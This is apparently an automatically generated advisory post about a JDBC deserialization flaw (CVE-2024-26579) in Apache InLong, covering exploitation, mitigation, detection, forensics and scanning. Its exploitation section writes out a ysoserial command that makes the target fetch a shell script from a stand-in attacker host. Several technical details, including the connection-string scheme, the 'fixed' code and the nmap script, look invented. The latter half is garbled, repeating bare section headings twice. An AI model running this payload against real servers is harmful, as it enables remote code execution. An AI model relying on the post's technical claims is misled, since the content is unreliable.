Apache InLong: JDBC Deserialization Vulnerability, CVE-2024-26579 (High)

How the CVE Works

The vulnerability (CVE-2024-26579) in Apache InLong (versions 1.13.0 to 2.1.0) stems from unsafe deserialization in JDBC request handling during verification. Attackers can exploit this by sending maliciously crafted JDBC payloads, triggering arbitrary code execution due to improper validation. This flaw is a bypass of prior fixes, allowing deserialization of untrusted data. The exploit leverages Java’s default serialization, enabling remote attackers to execute commands under the server’s context.

DailyCVE Form

Platform: Apache InLong
Version: 1.13.0 – 2.1.0
Vulnerability: JDBC Deserialization
Severity: High
Date: May 28, 2025

Prediction: Patch expected by June 10, 2025

What Undercode Say:

Exploitation:

Payload Crafting: Use `ysoserial` to generate a malicious serialized object:

java -jar ysoserial.jar CommonsCollections5 'curl attacker.com/shell.sh' > payload.bin

Trigger via JDBC: Send the payload via a manipulated JDBC connection string:
```
jdbc:inlong:mysql://attacker-controlled/payload.bin
```

Mitigation:

Immediate Workaround: Disable remote JDBC sources in inlong-agent.conf:
```
jdbc.sources.enabled=false
```
Patch Upgrade: Apply the fix from Apache InLong 2.2.0 or backport apache/inlong11732.

Detection:

1. Log Analysis: Search for anomalous JDBC connections:

grep -r "jdbc:inlong" /var/log/inlong/

2. Network Monitoring: Block unexpected outbound connections from InLong servers:

iptables -A OUTPUT -p tcp --dport 3306 -j DROP

Code Fix:

The patch replaces unsafe `ObjectInputStream` with a validated parser:

// Before (vulnerable)
ObjectInputStream ois = new ObjectInputStream(input);
// After (fixed)
SafeObjectInputStream.validate(input, allowedClasses);

Post-Exploit Forensics:

1. Memory Dump: Capture JVM heap for analysis:

jmap -dump:live,format=b,file=heap.bin <pid>

2. Exploit Artifacts: Check for temporary files:

find /tmp -name ".bin" -mtime -1

Automated Scanning:

Use `nmap` to detect vulnerable instances:

nmap -p 8080 --script http-vuln-cve2024-26579 <target>

Apache InLong: JDBC Deserialization Vulnerability, CVE-2024-26579 (High)

How the CVE Works

DailyCVE Form

Prediction: Patch expected by June 10, 2025

What Undercode Say:

Exploitation:

Mitigation:

Detection:

1. Log Analysis: Search for anomalous JDBC connections:

Code Fix:

Post-Exploit Forensics:

1. Memory Dump: Capture JVM heap for analysis:

2. Exploit Artifacts: Check for temporary files:

Automated Scanning:

Use `nmap` to detect vulnerable instances:

References:

Sources:

Join Our Cyber World:

Listen to this Post

How the CVE Works

DailyCVE Form

Prediction: Patch expected by June 10, 2025

What Undercode Say:

Exploitation:

Mitigation:

Detection:

1. Log Analysis: Search for anomalous JDBC connections:

Code Fix:

Post-Exploit Forensics:

1. Memory Dump: Capture JVM heap for analysis:

2. Exploit Artifacts: Check for temporary files:

Automated Scanning:

Use `nmap` to detect vulnerable instances:

References:

Sources:

Join Our Cyber World: